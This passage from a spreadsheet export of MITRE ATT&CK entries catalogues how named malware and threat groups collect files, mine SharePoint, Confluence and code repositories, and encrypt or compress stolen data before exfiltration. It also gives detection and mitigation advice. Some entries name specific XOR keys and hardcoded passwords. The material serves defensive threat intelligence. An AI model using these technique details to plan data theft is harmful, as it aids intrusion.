[Drovorub](https://attack.mitre.org/software/S0502) can transfer files from the victim machine.(Citation: NSA/FBI Drovorub August 2020)
Dtrack
[Dtrack](https://attack.mitre.org/software/S0567) can collect a variety of information from victim machines.(Citation: CyberBit Dtrack)
EnvyScout
[EnvyScout](https://attack.mitre.org/software/S0634) can collect sensitive NTLM material from a compromised host.(Citation: MSTIC Nobelium Toolset May 2021)
FLASHFLOOD
[FLASHFLOOD](https://attack.mitre.org/software/S0036) searches for interesting files (either a default or customized set of file extensions) on the local system. [FLASHFLOOD](https://attack.mitre.org/software/S0036) will scan the My Recent Documents, Desktop, Temporary Internet Files, and TEMP directories. [FLASHFLOOD](https://attack.mitre.org/software/S0036) also collects information stored in the Windows Address Book.(Citation: FireEye APT30)
FatDuke
[FatDuke](https://attack.mitre.org/software/S0512) can copy files and directories from a compromised host.(Citation: ESET Dukes October 2019)
Flagpro
[Flagpro](https://attack.mitre.org/software/S0696) can collect data from a compromised host, including Windows authentication information.(Citation: NTT Security Flagpro new December 2021)
FlawedAmmyy
[FlawedAmmyy](https://attack.mitre.org/software/S0381) has collected information and files from a compromised machine.(Citation: Korean FSI TA505 2020)
FoggyWeb
[FoggyWeb](https://attack.mitre.org/software/S0661) can retrieve configuration data from a compromised AD FS server.(Citation: MSTIC FoggyWeb September 2021)
Forfiles
[Forfiles](https://attack.mitre.org/software/S0193) can be used to act on (ex: copy, move, etc.) files/directories in a system during (ex: copy files into a staging area before).(Citation: Überwachung APT28 Forfiles June 2015)
FrameworkPOS
[FrameworkPOS](https://attack.mitre.org/software/S0503) can collect elements related to credit card data from process memory.(Citation: SentinelOne FrameworkPOS September 2019)
FunnyDream
[FunnyDream](https://attack.mitre.org/software/S1044) can upload files from victims' machines.(Citation: Bitdefender FunnyDream Campaign November 2020)(Citation: Kaspersky APT Trends Q1 2020)
Gelsemium
[Gelsemium](https://attack.mitre.org/software/S0666) can collect data from a compromised host.(Citation: ESET Gelsemium June 2021)
Goopy
[Goopy](https://attack.mitre.org/software/S0477) has the ability to exfiltrate documents from infected systems.(Citation: Cybereason Cobalt Kitty 2017)	
GravityRAT
[GravityRAT](https://attack.mitre.org/software/S0237) steals files with the following extensions: .docx, .doc, .pptx, .ppt, .xlsx, .xls, .rtf, and .pdf.(Citation: Talos GravityRAT)
Green Lambert
[Green Lambert](https://attack.mitre.org/software/S0690) can collect data from a compromised host.(Citation: Objective See Green Lambert for OSX Oct 2021)
GrimAgent
[GrimAgent](https://attack.mitre.org/software/S0632) can collect data and files from a compromised host.(Citation: Group IB GrimAgent July 2021)
Hikit
[Hikit](https://attack.mitre.org/software/S0009) can upload files from compromised machines.(Citation: Novetta-Axiom)
Hydraq
[Hydraq](https://attack.mitre.org/software/S0203) creates a backdoor through which remote attackers can read data from files.(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: Symantec Hydraq Jan 2010)
IceApple
[IceApple](https://attack.mitre.org/software/S1022) can collect files, passwords, and other data from a compromised host.(Citation: CrowdStrike IceApple May 2022)
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) can collect data from the system, and can monitor changes in specified directories.(Citation: ESET InvisiMole June 2018)
Ixeshe
[Ixeshe](https://attack.mitre.org/software/S0015) can collect data from a local system.(Citation: Trend Micro IXESHE 2012)
KGH_SPY
[KGH_SPY](https://attack.mitre.org/software/S0526) can send a file containing victim system information to C2.(Citation: Cybereason Kimsuky November 2020)
KONNI
[KONNI](https://attack.mitre.org/software/S0356) has stored collected information and discovered processes in a tmp file.(Citation: Malwarebytes Konni Aug 2021)
KOPILUWAK
[KOPILUWAK](https://attack.mitre.org/software/S1075) can gather information from compromised hosts.(Citation: Mandiant Suspected Turla Campaign February 2023)
Kazuar
[Kazuar](https://attack.mitre.org/software/S0265) uploads files from a specified directory to the C2 server.(Citation: Unit 42 Kazuar May 2017)
Kevin
[Kevin](https://attack.mitre.org/software/S1020) can upload logs and other data from a compromised host.(Citation: Kaspersky Lyceum October 2021)
Koadic
[Koadic](https://attack.mitre.org/software/S0250) can download files off the target system to send back to the server.(Citation: Github Koadic)(Citation: MalwareBytes LazyScripter Feb 2021)
LightNeuron
[LightNeuron](https://attack.mitre.org/software/S0395) can collect files from a local system.(Citation: ESET LightNeuron May 2019)
Linfo
[Linfo](https://attack.mitre.org/software/S0211) creates a backdoor through which remote attackers can obtain data from local systems.(Citation: Symantec Linfo May 2012)
MCMD
[MCMD](https://attack.mitre.org/software/S0500) has the ability to upload files from an infected device.(Citation: Secureworks MCMD July 2019)
MacMa
[MacMa](https://attack.mitre.org/software/S1016) can collect then exfiltrate files from the compromised system.(Citation: ESET DazzleSpy Jan 2022)
Machete
[Machete](https://attack.mitre.org/software/S0409) searches the File system for files of interest.(Citation: ESET Machete July 2019) 
Mafalda
[Mafalda](https://attack.mitre.org/software/S1060) can collect files and information from a compromised host.(Citation: SentinelLabs Metador Sept 2022)
MarkiRAT
[MarkiRAT](https://attack.mitre.org/software/S0652) can upload data from the victim's machine to the C2 server.(Citation: Kaspersky Ferocious Kitten Jun 2021)
Milan
[Milan](https://attack.mitre.org/software/S1015) can upload files from a compromised host.(Citation: ClearSky Siamesekitten August 2021)
Mis-Type
[Mis-Type](https://attack.mitre.org/software/S0084) has collected files and data from a compromised host.(Citation: Cylance Dust Storm)
Misdat
[Misdat](https://attack.mitre.org/software/S0083) has collected files and data from a compromised host.(Citation: Cylance Dust Storm)
MobileOrder
[MobileOrder](https://attack.mitre.org/software/S0079) exfiltrates data collected from the victim mobile device.(Citation: Scarlet Mimic Jan 2016)
Mongall
[Mongall](https://attack.mitre.org/software/S1026) has the ability to upload files from victim's machines.(Citation: SentinelOne Aoqin Dragon June 2022)
Nebulae
[Nebulae](https://attack.mitre.org/software/S0630) has the capability to upload collected files to C2.(Citation: Bitdefender Naikon April 2021)
Neoichor
[Neoichor](https://attack.mitre.org/software/S0691) can upload files from a victim's machine.(Citation: Microsoft NICKEL December 2021)
NightClub
[NightClub](https://attack.mitre.org/software/S1090) can use a file monitor to steal specific files from targeted systems.(Citation: MoustachedBouncer ESET August 2023)
OSX_OCEANLOTUS.D
[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) has the ability to upload files from a compromised host.(Citation: Trend Micro MacOS Backdoor November 2020)
Octopus
[Octopus](https://attack.mitre.org/software/S0340) can exfiltrate files from the system using a documents collector tool.(Citation: ESET Nomadic Octopus 2018)
Out1
[Out1](https://attack.mitre.org/software/S0594) can copy files and Registry data from compromised hosts.(Citation: Trend Micro Muddy Water March 2021)
OutSteel
[OutSteel](https://attack.mitre.org/software/S1017) can collect information from a compromised host.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )
P.A.S. Webshell
[P.A.S. Webshell](https://attack.mitre.org/software/S0598) has the ability to copy files on a compromised host.(Citation: ANSSI Sandworm January 2021)
POWERSTATS
[POWERSTATS](https://attack.mitre.org/software/S0223) can upload files from compromised hosts.(Citation: FireEye MuddyWater Mar 2018)
PUNCHTRACK
[PUNCHTRACK](https://attack.mitre.org/software/S0197) scrapes memory for properly formatted payment card data.(Citation: FireEye Fin8 May 2016)(Citation: FireEye Know Your Enemy FIN8 Aug 2016)
Pasam
[Pasam](https://attack.mitre.org/software/S0208) creates a backdoor through which remote attackers can retrieve files.(Citation: Symantec Pasam May 2012)
PcShare
[PcShare](https://attack.mitre.org/software/S1050) can collect files and information from a compromised host.(Citation: Bitdefender FunnyDream Campaign November 2020)
Pillowmint
[Pillowmint](https://attack.mitre.org/software/S0517) has collected credit card data using native API functions.(Citation: Trustwave Pillowmint June 2020)
PinchDuke
[PinchDuke](https://attack.mitre.org/software/S0048) collects user files from the compromised host based on predefined file extensions.(Citation: F-Secure The Dukes)
PingPull
[PingPull](https://attack.mitre.org/software/S1031) can collect data from a compromised host.(Citation: Unit 42 PingPull Jun 2022)
PoisonIvy
[PoisonIvy](https://attack.mitre.org/software/S0012) creates a backdoor through which remote attackers can steal system information.(Citation: Symantec Darkmoon Aug 2005)
PowerLess
[PowerLess](https://attack.mitre.org/software/S1012) has the ability to exfiltrate data, including Chrome and Edge browser database files, from compromised machines.(Citation: Cybereason PowerLess February 2022)
PowerSploit
[PowerSploit](https://attack.mitre.org/software/S0194) contains a collection of Exfiltration modules that can access data from local files, volumes, and processes.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)
Proxysvc
[Proxysvc](https://attack.mitre.org/software/S0238) searches the local system and gathers data.(Citation: McAfee GhostSecret)
QakBot
[QakBot](https://attack.mitre.org/software/S0650) can use a variety of commands, including esentutl.exe to steal sensitive data from Internet Explorer and Microsoft Edge, to acquire information that is subsequently exfiltrated.(Citation: Red Canary Qbot)(Citation: Kaspersky QakBot September 2021)
QuasarRAT
[QuasarRAT](https://attack.mitre.org/software/S0262) can retrieve files from compromised client machines.(Citation: CISA AR18-352A Quasar RAT December 2018)
QuietSieve
[QuietSieve](https://attack.mitre.org/software/S0686) can collect files from a compromised host.(Citation: Microsoft Actinium February 2022)
RCSession
[RCSession](https://attack.mitre.org/software/S0662) can collect data from a compromised host.(Citation: Profero APT27 December 2020)(Citation: Trend Micro DRBControl February 2020)
ROKRAT
[ROKRAT](https://attack.mitre.org/software/S0240) can collect host data and specific file types.(Citation: NCCGroup RokRat Nov 2018)(Citation: Volexity InkySquid RokRAT August 2021)(Citation: Malwarebytes RokRAT VBA January 2021)
RainyDay
[RainyDay](https://attack.mitre.org/software/S0629) can use a file exfiltration tool to collect recently changed files on a compromised host.(Citation: Bitdefender Naikon April 2021)
Ramsay
[Ramsay](https://attack.mitre.org/software/S0458) can collect Microsoft Word documents from the target's file system, as well as &lt;code&gt;.txt&lt;/code&gt;, &lt;code&gt;.doc&lt;/code&gt;, and &lt;code&gt;.xls&lt;/code&gt; files from the Internet Explorer cache.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)	
RawPOS
[RawPOS](https://attack.mitre.org/software/S0169) dumps memory from specific processes on a victim system, parses the dumped files, and scrapes them for credit card data.(Citation: Kroll RawPOS Jan 2017)(Citation: TrendMicro RawPOS April 2015)(Citation: Mandiant FIN5 GrrCON Oct 2016)
Rising Sun
[Rising Sun](https://attack.mitre.org/software/S0448) has collected data and files from a compromised host.(Citation: McAfee Sharpshooter December 2018)
Rover
[Rover](https://attack.mitre.org/software/S0090) searches for files on local drives based on a predefined list of file extensions.(Citation: Palo Alto Rover)
SDBbot
[SDBbot](https://attack.mitre.org/software/S0461) has the ability to access the file system on a compromised host.(Citation: Proofpoint TA505 October 2019)
SLOTHFULMEDIA
[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has uploaded files and information from victim machines.(Citation: CISA MAR SLOTHFULMEDIA October 2020)
STARWHALE
[STARWHALE](https://attack.mitre.org/software/S1037) can collect data from an infected local host.(Citation: DHS CISA AA22-055A MuddyWater February 2022)
SUNBURST
[SUNBURST](https://attack.mitre.org/software/S0559) collected information from a compromised host.(Citation: Microsoft Analyzing Solorigate Dec 2020)(Citation: FireEye SUNBURST Backdoor December 2020)
SVCReady
[SVCReady](https://attack.mitre.org/software/S1064) can collect data from an infected host.(Citation: HP SVCReady Jun 2022)
Saint Bot
[Saint Bot](https://attack.mitre.org/software/S1018) can collect files and information from a compromised host.(Citation: Malwarebytes Saint Bot April 2021)
Sardonic
[Sardonic](https://attack.mitre.org/software/S1085) has the ability to collect data from a compromised machine to deliver to the attacker.(Citation: Symantec FIN8 Jul 2023) 
Shark
[Shark](https://attack.mitre.org/software/S1019) can upload files to its C2.(Citation: ClearSky Siamesekitten August 2021)(Citation: Accenture Lyceum Targets November 2021)
SharpDisco
[SharpDisco](https://attack.mitre.org/software/S1089) has dropped a recent-files stealer plugin to `C:\Users\Public\WinSrcNT\It11.exe`.(Citation: MoustachedBouncer ESET August 2023)
ShimRat
[ShimRat](https://attack.mitre.org/software/S0444) has the capability to upload collected files to a C2.(Citation: FOX-IT May 2016 Mofang)	
SideTwist
[SideTwist](https://attack.mitre.org/software/S0610) has the ability to upload files from a compromised host.(Citation: Check Point APT34 April 2021)
SombRAT
[SombRAT](https://attack.mitre.org/software/S0615) has collected data and files from a compromised host.(Citation: BlackBerry CostaRicto November 2020)(Citation: CISA AR21-126A FIVEHANDS May 2021)
SpicyOmelette
[SpicyOmelette](https://attack.mitre.org/software/S0646) has collected data and other information from a compromised host.(Citation: Secureworks GOLD KINGSWOOD September 2018)
StrifeWater
[StrifeWater](https://attack.mitre.org/software/S1034) can collect data from a compromised host.(Citation: Cybereason StrifeWater Feb 2022)
SysUpdate
[SysUpdate](https://attack.mitre.org/software/S0663) can collect information and files from a compromised host.(Citation: Lunghi Iron Tiger Linux)
Taidoor
[Taidoor](https://attack.mitre.org/software/S0011) can upload data and files from a victim's machine.(Citation: TrendMicro Taidoor)
TajMahal
[TajMahal](https://attack.mitre.org/software/S0467) has the ability to steal documents from the local system including the print spooler queue.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Monitor for third-party application logging, messaging, and/or other artifacts that may leverage the SharePoint repository as a source to mine valuable information. Monitor access to Microsoft SharePoint repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) should be closely monitored and alerted upon, as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.
Logon Session Creation
Monitor for newly constructed logon behavior across Microsoft's SharePoint which can be configured to report access to certain pages and documents. (Citation: Microsoft SharePoint Logging) As information repositories generally have a considerably large user base, detection of malicious use can be non-trivial.
Audit
Consider periodic review of accounts and privileges for critical and sensitive SharePoint repositories.
User Account Management
Enforce the principle of least-privilege. Consider implementing access control mechanisms that include both authentication and authorization.
User Training
Develop and publish policies that define acceptable information to be stored in SharePoint repositories.
C0027
During [C0027](https://attack.mitre.org/campaigns/C0027), [Scattered Spider](https://attack.mitre.org/groups/G1015) accessed victim SharePoint environments to search for VPN and MFA enrollment information, help desk instructions, and new hire guides.(Citation: Crowdstrike TELCO BPO Campaign December 2022)
APT28
[APT28](https://attack.mitre.org/groups/G0007) has collected information from Microsoft SharePoint services within target networks.(Citation: RSAC 2015 Abu Dhabi Stefano Maccaglia)
Chimera
[Chimera](https://attack.mitre.org/groups/G0114) has collected documents from the victim's SharePoint.(Citation: NCC Group Chimera January 2021)
Ke3chang
[Ke3chang](https://attack.mitre.org/groups/G0004) used a SharePoint enumeration and data dumping tool known as spwebmember.(Citation: NCC Group APT15 Alive and Strong)
LAPSUS$
[LAPSUS$](https://attack.mitre.org/groups/G1004) has searched a victim's network for collaboration platforms like SharePoint to discover further high-privilege account credentials.(Citation: MSTIC DEV-0537 Mar 2022)(Citation: NCC Group LAPSUS Apr 2022)
spwebmember
[spwebmember](https://attack.mitre.org/software/S0227) is used to enumerate and dump information from Microsoft SharePoint.(Citation: NCC Group APT15 Alive and Strong)
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Monitor for third-party application logging, messaging, and/or other artifacts that may leverage Confluence repositories to mine valuable information. Watch for access to Confluence repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.
Logon Session Creation
Monitor for newly constructed logon behavior across Atlassian's Confluence which can be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.
Audit
Consider periodic review of accounts and privileges for critical and sensitive Confluence repositories.
User Account Management
Enforce the principle of least-privilege. Consider implementing access control mechanisms that include both authentication and authorization.
User Training
Develop and publish policies that define acceptable information to be stored in Confluence repositories.
LAPSUS$
[LAPSUS$](https://attack.mitre.org/groups/G1004) has searched a victim's network for collaboration platforms like Confluence and JIRA to discover further high-privilege account credentials.(Citation: MSTIC DEV-0537 Mar 2022)
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Monitor for third-party application logging, messaging, and/or other artifacts that may leverage code repositories to collect valuable information. Monitor access to code repositories, especially performed by privileged users such as Active Directory Domain or Enterprise Administrators as these types of accounts should generally not be used to access code repositories. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user-based anomalies.
Logon Session Creation
Monitor for newly constructed logon behavior across code repositories (e.g. Github) which can be configured to report access to certain pages and documents.
Audit
Consider periodic reviews of accounts and privileges for critical and sensitive code repositories. Scan code repositories for exposed credentials or other sensitive information.
Multi-factor Authentication
Use multi-factor authentication for logons to code repositories.
User Account Management
Enforce the principle of least-privilege. Consider implementing access control mechanisms that include both authentication and authorization for code repositories.
User Training
Develop and publish policies that define acceptable information to be stored in code repositories.
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) downloaded source code from code repositories.(Citation: Microsoft Internal Solorigate Investigation Blog)
LAPSUS$
[LAPSUS$](https://attack.mitre.org/groups/G1004) has searched a victim's network for code repositories like GitLab and GitHub to discover further high-privilege account credentials.(Citation: MSTIC DEV-0537 Mar 2022)(Citation: NCC Group LAPSUS Apr 2022)
</t>
  </si>
  <si>
    <t xml:space="preserve">Network Connection Creation
Monitor for newly constructed network connections that are sent or received by untrusted hosts or uncommon data flows. Consider analyzing packet contents to detect application layer protocols, leveraging SSL/TLS inspection for encrypted traffic, that do not follow the expected protocol standards and traffic flows (e.g. unauthorized, gratuitous, or anomalous traffic patterns attempting to access network configuration content)
Network Traffic Content
Monitor and analyze traffic patterns and packet inspection associated to protocol(s) that do not follow the expected protocol standards and traffic flows (e.g. unauthorized, gratuitous, or anomalous traffic patterns attempting to access network configuration content)
Encrypt Sensitive Information
Configure SNMPv3 to use the highest level of security (authPriv) available.(Citation: US-CERT TA17-156A SNMP Abuse 2017) 
Filter Network Traffic
Apply extended ACLs to block unauthorized protocols outside the trusted network.(Citation: US-CERT TA17-156A SNMP Abuse 2017)
Network Intrusion Prevention
Configure intrusion prevention devices to detect SNMP queries and commands from unauthorized sources. Create signatures to detect Smart Install (SMI) usage from sources other than trusted director.(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)
Network Segmentation
Segregate SNMP traffic on a separate management network.(Citation: US-CERT TA17-156A SNMP Abuse 2017) 
Software Configuration
Allowlist MIB objects and implement SNMP views. Disable Smart Install (SMI) if not used.(Citation: Cisco Securing SNMP)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018) 
Update Software
Keep system images and software updated and migrate to SNMPv3.(Citation: Cisco Blog Legacy Device Attacks)
</t>
  </si>
  <si>
    <t xml:space="preserve">File Creation
Monitor newly constructed files being written with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.
Script Execution
Monitor for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C0017
During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) hex-encoded PII data prior to exfiltration.(Citation: Mandiant APT41)
CopyKittens
[CopyKittens](https://attack.mitre.org/groups/G0052) encrypts data with a substitute cipher prior to exfiltration.(Citation: CopyKittens Nov 2015)
FIN6
[FIN6](https://attack.mitre.org/groups/G0037) has encoded data gathered from the victim with a simple substitution cipher and single-byte XOR using the 0xAA key, and Base64 with character permutation.(Citation: FireEye FIN6 April 2016)(Citation: Trend Micro FIN6 October 2019)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has used RC4 encryption before exfil.(Citation: Securelist Kimsuky Sept 2013)
Lazarus Group
A [Lazarus Group](https://attack.mitre.org/groups/G0032) malware sample encrypts data using a simple byte based XOR operation prior to exfiltration.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Loaders)(Citation: Novetta Blockbuster RATs)(Citation: McAfee Lazarus Resurfaces Feb 2018)
Mustang Panda
[Mustang Panda](https://attack.mitre.org/groups/G0129) has encrypted documents with RC4 prior to exfiltration.(Citation: Avira Mustang Panda January 2020)
ADVSTORESHELL
[ADVSTORESHELL](https://attack.mitre.org/software/S0045) compresses output data generated by command execution with a custom implementation of the Lempel–Ziv–Welch (LZW) algorithm.(Citation: ESET Sednit Part 2)
Agent.btz
[Agent.btz](https://attack.mitre.org/software/S0092) saves system information into an XML file that is then XOR-encoded.(Citation: ThreatExpert Agent.btz)
Attor
[Attor](https://attack.mitre.org/software/S0438) encrypts collected data with a custom implementation of Blowfish and RSA ciphers.(Citation: ESET Attor Oct 2019)
BLUELIGHT
[BLUELIGHT](https://attack.mitre.org/software/S0657) has encoded data into a binary blob using XOR.(Citation: Volexity InkySquid BLUELIGHT August 2021)
Duqu
Modules can be pushed to and executed by [Duqu](https://attack.mitre.org/software/S0038) that copy data to a staging area, compress it, and XOR encrypt it.(Citation: Symantec W32.Duqu)
FLASHFLOOD
[FLASHFLOOD](https://attack.mitre.org/software/S0036) employs the same encoding scheme as [SPACESHIP](https://attack.mitre.org/software/S0035) for data it stages. Data is compressed with zlib, and bytes are rotated four times before being XOR'ed with 0x23.(Citation: FireEye APT30)
FoggyWeb
[FoggyWeb](https://attack.mitre.org/software/S0661) can use a dynamic XOR key and a custom XOR methodology to encode data before exfiltration. Also, [FoggyWeb](https://attack.mitre.org/software/S0661) can encode C2 command output within a legitimate WebP file.(Citation: MSTIC FoggyWeb September 2021)
FrameworkPOS
[FrameworkPOS](https://attack.mitre.org/software/S0503) can XOR credit card information before exfiltration.(Citation: SentinelOne FrameworkPOS September 2019)
FunnyDream
[FunnyDream](https://attack.mitre.org/software/S1044) has compressed collected files with zLib and encrypted them using an XOR operation with the string key from the command line or `qwerasdf` if the command line argument doesn’t contain the key. File names are obfuscated using XOR with the same key as the compressed file content.(Citation: Bitdefender FunnyDream Campaign November 2020)
HAWKBALL
[HAWKBALL](https://attack.mitre.org/software/S0391) has encrypted data with XOR before sending it over the C2 channel.(Citation: FireEye HAWKBALL Jun 2019)
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) uses a variation of the XOR cipher to encrypt files before exfiltration.(Citation: ESET InvisiMole June 2018)
MESSAGETAP
[MESSAGETAP](https://attack.mitre.org/software/S0443) has XOR-encrypted and stored contents of SMS messages that matched its target list. (Citation: FireEye MESSAGETAP October 2019)
Machete
[Machete](https://attack.mitre.org/software/S0409)'s collected data is encrypted with AES before exfiltration.(Citation: ESET Machete July 2019) 
NETWIRE
[NETWIRE](https://attack.mitre.org/software/S0198) has used a custom encryption algorithm to encrypt collected data.(Citation: FireEye NETWIRE March 2019)
OSX_OCEANLOTUS.D
[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) has used AES in CBC mode to encrypt collected data when saving that data to disk.(Citation: Unit42 OceanLotus 2017)
Okrum
[Okrum](https://attack.mitre.org/software/S0439) has used a custom implementation of AES encryption to encrypt collected data.(Citation: ESET Okrum July 2019)
OopsIE
[OopsIE](https://attack.mitre.org/software/S0264) compresses collected files with a simple character replacement scheme before sending them to its C2 server.(Citation: Unit 42 OopsIE! Feb 2018)
OwaAuth
[OwaAuth](https://attack.mitre.org/software/S0072) DES-encrypts captured credentials using the key 12345678 before writing the credentials to a log file.(Citation: Dell TG-3390)
RGDoor
[RGDoor](https://attack.mitre.org/software/S0258) encrypts files with XOR before sending them back to the C2 server.(Citation: Unit 42 RGDoor Jan 2018)
Ramsay
[Ramsay](https://attack.mitre.org/software/S0458) can store collected documents in a custom container after encrypting and compressing them using RC4 and WinRAR.(Citation: Eset Ramsay May 2020)
RawPOS
[RawPOS](https://attack.mitre.org/software/S0169) encodes credit card data it collected from the victim with XOR.(Citation: TrendMicro RawPOS April 2015)(Citation: Mandiant FIN5 GrrCON Oct 2016)(Citation: Visa RawPOS March 2015)
Reaver
[Reaver](https://attack.mitre.org/software/S0172) encrypts collected data with an incremental XOR key prior to exfiltration.(Citation: Palo Alto Reaver Nov 2017)
Rising Sun
[Rising Sun](https://attack.mitre.org/software/S0448) can archive data using RC4 encryption and Base64 encoding prior to exfiltration.(Citation: McAfee Sharpshooter December 2018)	
SPACESHIP
Data [SPACESHIP](https://attack.mitre.org/software/S0035) copies to the staging area is compressed with zlib. Bytes are rotated by four positions and XOR'ed with 0x23.(Citation: FireEye APT30)
SUGARDUMP
[SUGARDUMP](https://attack.mitre.org/software/S1042) has encrypted collected data using AES CBC mode and encoded it using Base64.(Citation: Mandiant UNC3890 Aug 2022)
SombRAT
[SombRAT](https://attack.mitre.org/software/S0615) has encrypted collected data with AES-256 using a hardcoded key.(Citation: BlackBerry CostaRicto November 2020)
Squirrelwaffle
[Squirrelwaffle](https://attack.mitre.org/software/S1030) has encrypted collected data using a XOR-based algorithm.(Citation: ZScaler Squirrelwaffle Sep 2021)
StrongPity
[StrongPity](https://attack.mitre.org/software/S0491) can compress and encrypt archived files into multiple .sft files with a repeated xor encryption scheme.(Citation: Talos Promethium June 2020)(Citation: Bitdefender StrongPity June 2020)
Stuxnet
[Stuxnet](https://attack.mitre.org/software/S0603) encrypts exfiltrated data via C2 with static 31-byte long XOR keys.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
T9000
[T9000](https://attack.mitre.org/software/S0098) encrypts collected data using a single byte XOR key.(Citation: Palo Alto T9000 Feb 2016)
metaMain
[metaMain](https://attack.mitre.org/software/S1059) has used XOR-based encryption for collected files before exfiltration.(Citation: SentinelLabs Metador Sept 2022)
</t>
  </si>
  <si>
    <t xml:space="preserve">File Creation
Monitor newly constructed files being written with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.
Script Execution
Monitor for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Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) malware IndiaIndia saves information gathered about the victim to a file that is compressed with Zlib, encrypted, and uploaded to a C2 server.(Citation: Novetta Blockbuster RATs)(Citation: McAfee Lazarus Resurfaces Feb 2018)
Threat Group-3390
[Threat Group-3390](https://attack.mitre.org/groups/G0027) has used RAR to compress, encrypt, and password-protect files prior to exfiltration.(Citation: SecureWorks BRONZE UNION June 2017)
BADFLICK
[BADFLICK](https://attack.mitre.org/software/S0642) has compressed data using the aPLib compression library.(Citation: Accenture MUDCARP March 2019)
BBSRAT
[BBSRAT](https://attack.mitre.org/software/S0127) can compress data with ZLIB prior to sending it back to the C2 server.(Citation: Palo Alto Networks BBSRAT)
Cardinal RAT
[Cardinal RAT](https://attack.mitre.org/software/S0348) applies compression to C2 traffic using the ZLIB library.(Citation: PaloAlto CardinalRat Apr 2017)
Denis
[Denis](https://attack.mitre.org/software/S0354) compressed collected data using zlib.(Citation: Securelist Denis April 2017)
Epic
[Epic](https://attack.mitre.org/software/S0091) compresses the collected data with bzip2 before sending it to the C2 server.(Citation: Kaspersky Turla Aug 2014)
FoggyWeb
[FoggyWeb](https://attack.mitre.org/software/S0661) can invoke the `Common.Compress` method to compress data with the C# GZipStream compression class.(Citation: MSTIC FoggyWeb September 2021)
FunnyDream
[FunnyDream](https://attack.mitre.org/software/S1044) has compressed collected files with zLib.(Citation: Bitdefender FunnyDream Campaign November 2020)
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) can use zlib to compress and decompress data.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)
OSX_OCEANLOTUS.D
[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) scrambles and encrypts data using AES256 before sending it to the C2 server.(Citation: TrendMicro MacOS April 2018)(Citation: Trend Micro MacOS Backdoor November 2020)
SeaDuke
[SeaDuke](https://attack.mitre.org/software/S0053) compressed data with zlib prior to sending it over C2.(Citation: Mandiant No Easy Breach)
TajMahal
[TajMahal](https://attack.mitre.org/software/S0467) has the ability to use the open source libraries XZip/Xunzip and zlib to compress files.(Citation: Kaspersky TajMahal April 2019)
ZLib
The [ZLib](https://attack.mitre.org/software/S0086) backdoor compresses communications using the standard Zlib compression library.(Citation: Cylance Dust Storm)
</t>
  </si>
  <si>
    <t xml:space="preserve">Network Connection Creation
Monitor for newly constructed network connections that are sent or received by untrusted hosts or uncommon data flows. Consider analyzing packet contents to detect application layer protocols, leveraging SSL/TLS inspection for encrypted traffic, that do not follow the expected protocol standards and traffic flows(e.g. snmp traffic originating from unauthorized or untrusted hosts, signature detection for strings mapped to device configuration(s), and anomolies in snmp request(s))
Network Traffic Content
Monitor and analyze traffic patterns and packet inspection associated to protocol(s) that do not follow the expected protocol standards and traffic flow (e.g. snmp traffic originating from unauthorized or untrusted hosts, signature detection for strings mapped to device configuration(s), and anomolies in snmp request(s))
Encrypt Sensitive Information
Configure SNMPv3 to use the highest level of security (authPriv) available.(Citation: US-CERT TA17-156A SNMP Abuse 2017)
Filter Network Traffic
Apply extended ACLs to block unauthorized protocols outside the trusted network.(Citation: US-CERT TA17-156A SNMP Abuse 2017)
Network Intrusion Prevention
Configure intrusion prevention devices to detect SNMP queries and commands from unauthorized sources.(Citation: US-CERT-TA18-106A)
Network Segmentation
Segregate SNMP traffic on a separate management network.(Citation: US-CERT TA17-156A SNMP Abuse 2017)
Software Configuration
Allowlist MIB objects and implement SNMP views.(Citation: Cisco Securing SNMP)
Update Software
Keep system images and software updated and migrate to SNMPv3.(Citation: Cisco Blog Legacy Device Attacks)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
